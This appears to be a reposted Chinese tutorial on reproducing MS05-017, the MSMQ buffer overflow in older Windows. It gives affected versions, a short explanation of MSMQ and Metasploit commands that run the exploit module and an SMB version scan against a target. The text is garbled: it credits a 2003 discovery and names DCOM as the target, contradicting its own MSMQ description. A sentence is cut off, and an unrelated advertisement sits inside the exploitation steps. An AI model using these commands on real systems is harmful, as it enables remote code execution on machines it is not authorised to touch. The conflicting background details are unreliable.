漏洞描述

此漏洞由lds-pl.net漏洞研究組在2003年7月16日發(fā)現(xiàn)，漏洞及exp在網(wǎng)上公開(kāi)后，網(wǎng)上出現(xiàn)了大量的×××實(shí)例，利用此漏洞的蠕蟲(chóng)也大量出現(xiàn)。

漏洞編號(hào)

CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112

×××目標(biāo)

DCOM接口的服務(wù)器端

影響系統(tǒng)

    Microsoft Windows XP Service Pack 1
    Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
    Microsoft Windows 2000 Service Pack 4
    Microsoft Windows 2000 Service Pack 3
    Microsoft Windows 98 Second Edition (SE) 
    Microsoft Windows 98

漏洞原理

msmq在將輸入的字符串傳遞到緩沖區(qū)之前沒(méi)有執(zhí)行正確的驗(yàn)證，因此，可通過(guò)傳遞特制的msmq消息來(lái)觸發(fā)漏洞造成緩沖區(qū)溢出漏洞。漏洞可導(dǎo)致遠(yuǎn)程代碼執(zhí)行、本地提權(quán)。由于msmq

概念解釋

1. msmq( MicroSoft Message Queuing， 微軟消息隊(duì)列)是在多個(gè)不同的應(yīng)用之間實(shí)現(xiàn)互相通信的一種異步消息傳輸模式，互相通信的應(yīng)用可以位于同一臺(tái)機(jī)器上，也可以分布于網(wǎng)絡(luò)空間中的任意位置。msmq實(shí)現(xiàn)原理：消息的發(fā)送者將想要發(fā)送的消息發(fā)送至一個(gè)message中，然后保存至一個(gè)系統(tǒng)公共空間的消息隊(duì)列（Message Queuing）中，需要接受message的應(yīng)用從Message Queuing中取出Message進(jìn)行處理。msmq在消息傳遞時(shí)，需要借助hostname來(lái)通信。

metasploit exp可用目標(biāo)

Windows 2000 ALL 
Windows XP SP0-SP1 (English)

metasploit利用ms05-017

利用此payload需要netbios hostname、ip、port三項(xiàng)內(nèi)容

成都創(chuàng)新互聯(lián)公司-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價(jià)比黃龍網(wǎng)站開(kāi)發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式黃龍網(wǎng)站制作公司更省心,省錢(qián),快速模板網(wǎng)站建設(shè)找我們，業(yè)務(wù)覆蓋黃龍地區(qū)。費(fèi)用合理售后完善，十載實(shí)體公司更值得信賴。

use exploit/windows/dcerpc/ms05_017_msmq
set hname <target hostname>
set rhost <target ip>
set rport <target port>
run -j

msf中查看hname

use scanner/smb/smb_version
set rhost <target ip>
set threads 24
run

不使用metasploit情況下利用ms05-017

暫未發(fā)現(xiàn)，后續(xù)補(bǔ)充

參考文章

1. MS05-017 Microsoft Message Queueing Service Path Overflow
2. Virus Encyclopedia
3. MSMQ

網(wǎng)頁(yè)名稱：ms05-017漏洞原理與復(fù)現(xiàn)
文章URL：http://www.chinadenli.net/article38/jcoesp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供ChatGPT、網(wǎng)站制作、營(yíng)銷型網(wǎng)站建設(shè)、App設(shè)計(jì)、定制網(wǎng)站、小程序開(kāi)發(fā)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)